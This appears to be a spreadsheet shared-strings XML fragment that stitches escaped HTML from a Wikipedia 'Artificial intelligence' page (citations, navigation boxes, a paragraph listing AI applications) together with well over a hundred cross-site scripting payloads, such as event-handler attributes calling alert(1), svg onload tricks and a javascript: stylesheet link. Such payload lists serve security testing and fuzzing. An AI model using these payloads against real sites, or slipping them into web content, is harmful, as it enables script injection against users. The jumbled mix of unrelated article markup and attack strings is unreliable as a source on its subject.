    <t xml:space="preserve">&lt;li id="cite_note-Informed_search-189"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Informed_search_189-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;blink onpointerup=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 18.3 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;legend id=x tabindex=1 onactivate=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			In other projects</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Health_informatics" title="Health informatics"&gt;Computational healthcare &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdi oncontextmenu="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;legend id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/legend&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a id=x tabindex=1 onfocus=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpointerover=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;template onmousedown="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;strike id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;canvas id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointerover=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-298"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-298"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-376"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-376"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;output ondrop=alert(1) contenteditable&gt;drop here&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;base id=x tabindex=1 onactivate=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;q onpointermove=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;bdi id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2F64.336150"&gt;10.1109/64.336150 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Expert&amp;amp;rft.atitle=The+paradoxical+success+of+fuzzy+logic&amp;amp;rft.volume=9&amp;amp;rft.issue=4&amp;amp;rft.pages=3-49&amp;amp;rft.date=1994&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.100.8402&amp;amp;rft_id=info%3Adoi%2F10.1109%2F64.336150&amp;amp;rft.aulast=Elkan&amp;amp;rft.aufirst=Charles&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;ruby onload=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Infosys&amp;amp;rft.atitle=Role+of+AI+in+travel+and+Hospitality+Industry&amp;amp;rft.date=2018&amp;amp;rft_id=https%3A%2F%2Fwww.infosys.com%2Findustries%2Ftravel-hospitality%2Fdocuments%2Fai-travel-hospitality.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style onpaste="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;blink draggable="true" ondrag="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onbeforecopy="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-138"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-138"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=8" title="Edit section: Learning"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;kbd onclick="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;form style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;dd onbeforecut="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;br style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFEdelson1991"&gt;Edelson 1991 &lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Logic-based </t>
  </si>
  <si>
    <t>&lt;dir id=x tabindex=1 onfocus=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Machine_Intelligence_Research_Institute" title="Machine Intelligence Research Institute"&gt;Machine Intelligence Research Institute &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rt onmouseup="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Behaviorism" title="Behaviorism"&gt;Behaviorism &lt;/a&gt; (&lt;a href="/wiki/Radical_behaviorism" title="Radical behaviorism"&gt;Radical &lt;/a&gt;) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;track onmouseover="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-59"&gt;&lt;a href="#Malevolent_and_friendly_AI"&gt;&lt;span class="tocnumber"&gt;8.3.3 </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;basefont ondrop=alert(1) contenteditable&gt;drop here&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;colgroup style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;spacer draggable="true" ondragend="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;address ondragover=alert(1) contenteditable&gt;drop here&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onblur=alert(1) tabindex=1 id=x&gt;&lt;/acronym&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg draggable="true" ondrag="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;title id=x tabindex=1 onactivate=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;rp ondblclick="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;output draggable="true" ondragleave="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;em ondrop=alert(1) contenteditable&gt;drop here&lt;/em&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Knowledge_representation-91"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Knowledge_representation_91-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;High-profile examples of AI include autonomous vehicles (such as &lt;a href="/wiki/Unmanned_aerial_vehicle" title="Unmanned aerial vehicle"&gt;drones &lt;/a&gt; and &lt;a href="/wiki/Self-driving_cars" class="mw-redirect" title="Self-driving cars"&gt;self-driving cars &lt;/a&gt;), medical diagnosis, creating art (such as poetry), proving mathematical theorems, playing games (such as Chess or Go), search engines (such as &lt;a href="/wiki/Google_search" class="mw-redirect" title="Google search"&gt;Google search &lt;/a&gt;), online assistants (such as &lt;a href="/wiki/Siri" title="Siri"&gt;Siri &lt;/a&gt;), image recognition in photographs, spam filtering, predicting flight delays,&lt;sup id="cite_ref-292" class="reference"&gt;&lt;a href="#cite_note-292"&gt;&amp;#91;281&amp;#93; &lt;/a&gt; &lt;/sup&gt; prediction of judicial decisions,&lt;sup id="cite_ref-ecthr2016_293-0" class="reference"&gt;&lt;a href="#cite_note-ecthr2016-293"&gt;&amp;#91;282&amp;#93; &lt;/a&gt; &lt;/sup&gt; targeting online advertisements, &lt;sup id="cite_ref-FOOTNOTERussellNorvig20091_289-1" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig20091-289"&gt;&amp;#91;278&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-294" class="reference"&gt;&lt;a href="#cite_note-294"&gt;&amp;#91;283&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-295" class="reference"&gt;&lt;a href="#cite_note-295"&gt;&amp;#91;284&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Energy_storage" title="Energy storage"&gt;energy storage &lt;/a&gt;&lt;sup id="cite_ref-296" class="reference"&gt;&lt;a href="#cite_note-296"&gt;&amp;#91;285&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-302"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-302"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;caption id=x tabindex=1 onactivate=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmouseover="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onbeforecopy="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;element onpointerout=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;i onbeforepaste="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;xmp id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;em draggable="true" ondrag="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;ol&gt;&lt;li&gt;If someone has a "threat" (that is, two in a row), take the remaining square. Otherwise, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onmouseover="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_multimodal_optimization" title="Evolutionary multimodal optimization"&gt;Evolutionary multimodal optimization &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:John_McCarthy_navbox" title="Template:John McCarthy navbox"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:John_McCarthy_navbox" title="Template talk:John McCarthy navbox"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:John_McCarthy_navbox&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onbeforepaste="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=www.cnas.org%2Fpublications%2Freports%2Funderstanding-chinas-ai-strategy&amp;amp;rft.atitle=Understanding+China%27s+AI+Strategy&amp;amp;rft.date=2019-02-06&amp;amp;rft.aulast=Allen&amp;amp;rft.aufirst=Gregory&amp;amp;rft_id=https%3A%2F%2Fwww.cnas.org%2Fpublications%2Freports%2Funderstanding-chinas-ai-strategy&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;rp onmouseout="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-292"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-292"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;applet onpointerout=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;ol class="references"&gt;</t>
  </si>
  <si>
    <t>&lt;slot draggable="true" ondragleave="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;slot onpointerup=alert(1)&gt;XSS&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.scientificamerican.com/article/can-neural-network-comput/"&gt;"Can neural network computers learn from experience, and if so, could they ever become what we would call 'smart'?" &lt;/a&gt;. &lt;i&gt;Scientific American &lt;/i&gt;. 2018&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;24 March </t>
  </si>
  <si>
    <t>&lt;strike onmousedown="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointermove=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;option onmouseup="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Vox&amp;amp;rft.atitle=Will+artificial+intelligence+destroy+humanity%3F+Here+are+5+reasons+not+to+worry.&amp;amp;rft.date=2014-08-22&amp;amp;rft_id=https%3A%2F%2Fwww.vox.com%2F2014%2F8%2F22%2F6043635%2F5-reasons-we-shouldnt-worry-about-super-intelligent-computers-taking&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;embed oncopy="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMoravec1988"&gt;Moravec 1988 &lt;/a&gt;, p.&amp;#160;9 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;canvas ondragover=alert(1) contenteditable&gt;drop here&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;title onclick="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;dt&gt;Versions&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;object onpointerenter=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;dd draggable="true" ondragend="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;rp onmouseleave="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;map onbeforecut="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;dir onload=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset draggable="true" ondragend="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;hr id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>document.write(213)</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;progress id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/progress&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;img draggable="true" ondragenter="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Herbert_Spencer" title="Herbert Spencer"&gt;Herbert Spencer &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEHinton2007-254"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEHinton2007_254-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;i onpaste="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;col style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-373"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-373"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;rp id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/rp&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointerdown=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup draggable="true" ondrag="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-4"&gt;&lt;a href="#Challenges"&gt;&lt;span class="tocnumber"&gt;4 </t>
  </si>
  <si>
    <t>&lt;tr onmouseup="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;form onpointerover=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=75" title="Edit section: Other sources"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;165–191, 333–381, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tr onkeypress="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="padding:0em 0.25em"&gt; &lt;/div&gt;&lt;table class="nowraplinks navbox-subgroup" style="border-spacing:0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Concepts &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;map id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/map&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;nav onbeforecopy="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;frame id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointerleave=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-info-lastmod"&gt; This page was last edited on 16 March 2020, at 02:03&lt;span class="anonymous-show"&gt;&amp;#160;(UTC) </t>
  </si>
  <si>
    <t>&lt;meta onblur=alert(1) tabindex=1 id=x&gt;&lt;/meta&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onpointerover=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;html onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/html&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;track ondrop=alert(1) contenteditable&gt;drop here&lt;/track&gt;</t>
  </si>
  <si>
    <t>AI in England:</t>
  </si>
  <si>
    <t>&lt;dir onkeydown="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;content onload=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;LINK REL="stylesheet" HREF="javascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onblur=alert(1) tabindex=1 id=x&gt;&lt;/noembed&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_chemistry" title="Philosophy of chemistry"&gt;Chemistry &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Superintelligence"&gt;Superintelligence </t>
  </si>
  <si>
    <t>&lt;nav draggable="true" ondragenter="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;br id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;ins oncontextmenu="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/items.html"&gt;&lt;span class="doc"&gt;Items</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Fuzzy_logic-201"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Fuzzy_logic_201-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;noembed ondblclick="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;legend draggable="true" ondragstart="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Agricultural_robot" title="Agricultural robot"&gt;Agricultural &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meta onkeyup="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Finance and economics </t>
  </si>
  <si>
    <t>&lt;body onbeforecopy="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;picture style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onmouseup="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;dir draggable="true" ondragstart="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Law-related professions </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Laird, John (2008). "Extending the Soar cognitive architecture". &lt;i&gt;Frontiers in Artificial Intelligence and Applications &lt;/i&gt;. &lt;b&gt;171 &lt;/b&gt;: 224. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.77.2473"&gt;10.1.1.77.2473 &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Evi_(software)" title="Evi (software)"&gt;Evi &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computability" title="Computability"&gt;Computability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;Natural language processing &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;ul draggable="true" ondragenter="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;rtc id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Wikipedia:WikiProject_Philosophy" title="Wikipedia:WikiProject Philosophy"&gt;Project &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dl onkeyup="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+New+York+Times&amp;amp;rft.atitle=The+Promise+of+Artificial+Intelligence+Unfolds+in+Small+Steps&amp;amp;rft.date=2016-02-28&amp;amp;rft.aulast=Lohr&amp;amp;rft.aufirst=Steve&amp;amp;rft_id=https%3A%2F%2Fwww.nytimes.com%2F2016%2F02%2F29%2Ftechnology%2Fthe-promise-of-artificial-intelligence-unfolds-in-small-steps.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Hierarchical_control_system-181"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Hierarchical_control_system_181-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;dd id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
